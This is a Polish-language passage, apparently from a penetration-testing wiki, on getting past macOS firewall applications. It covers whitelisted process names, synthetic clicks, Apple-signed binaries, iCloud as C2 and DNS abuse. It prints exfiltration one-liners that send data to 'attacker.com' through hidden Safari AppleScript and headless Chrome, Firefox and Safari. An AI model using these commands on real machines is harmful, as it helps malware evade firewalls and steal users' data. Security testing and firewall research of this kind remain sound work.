Znalezione techniki

Poniższe techniki zostały znalezione działające w niektórych aplikacjach zapór sieciowych macOS.

Nadużywanie nazw na białej liście

• Na przykład nazywanie złośliwego oprogramowania nazwami znanych procesów macOS, takich jak launchd

Kliknięcie syntetyczne

• Jeśli zapora prosi użytkownika o zgodę, złośliwe oprogramowanie może kliknąć na zezwolenie

Używanie podpisanych binariów Apple

• Takich jak curl, ale także innych, takich jak whois

Znane domeny Apple

Zapora może zezwalać na połączenia do znanych domen Apple, takich jak apple.com lub icloud.com. A iCloud może być używane jako C2.

Ogólne Bypassowanie

Kilka pomysłów na próbę obejścia zapór sieciowych

Sprawdź dozwolony ruch

Znajomość dozwolonego ruchu pomoże Ci zidentyfikować potencjalnie na białej liście domeny lub aplikacje, które mają do nich dostęp.

lsof -i TCP -sTCP:ESTABLISHED

Nadużywanie DNS

Rozdzielczość DNS jest wykonywana za pomocą podpisanego aplikacji mdnsreponder, która prawdopodobnie będzie miała zezwolenie na kontakt z serwerami DNS.

Przez aplikacje przeglądarki

• oascript

tell application "Safari"
run
tell application "Finder" to set visible of process "Safari" to false
make new document
set the URL of document 1 to "https://attacker.com?data=data%20to%20exfil
end tell

• Google Chrome

"Google Chrome" --crash-dumps-dir=/tmp --headless "https://attacker.com?data=data%20to%20exfil"

• Firefox

firefox-bin --headless "https://attacker.com?data=data%20to%20exfil"

• Safari

open -j -a Safari "https://attacker.com?data=data%20to%20exfil"

Poprzez wstrzykiwanie procesów

Jeśli możesz wstrzyknąć kod do procesu, który ma zezwolenie na połączenie z dowolnym serwerem, możesz ominąć zabezpieczenia zapory ogniowej:

Referencje

• https://www.youtube.com/watch?v=UlT5KFTMn2k